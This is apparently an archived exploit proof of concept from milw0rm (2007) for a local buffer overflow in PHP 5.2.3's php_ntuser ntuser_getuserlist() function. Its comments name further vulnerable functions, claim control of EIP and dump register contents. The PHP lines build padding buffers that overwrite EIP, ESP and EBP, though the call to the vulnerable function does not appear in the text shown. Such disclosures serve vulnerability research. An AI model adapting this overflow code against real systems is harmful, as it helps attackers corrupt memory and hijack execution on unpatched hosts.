//PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//greetz to BrainBugger Crew
//Bug discovered with "Footzo" (thanks to rgod) modified.
//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar
//also theese are vulnerable:
//ntuser_getusergroups <-- DoS, we control EAX
//ntuser_getdomaincontroller <-- DoS, we control EAX
//ntuser_getuserinfo <-- BoF, we control EIP 00410041
//This is the content of registers:
//ECX 00000754
//EDX 00000041
//EBX 00223D18
//ESP 00C0FB34 UNICODE "CCC... x 100"
//EBP 00C0FBD0 UNICODE "CCC + DDD... x 100"
//ESI 011AC4A8
//EDI 011ADC00
//EIP 00410041
$buff = str_repeat("\x41", 250);
$get_EIP = "\x42\x42";
$get_ESP = str_repeat("\x43", 100);
$get_EBP = str_repeat("\x44", 100);
# milw0rm.com [2007-08-23]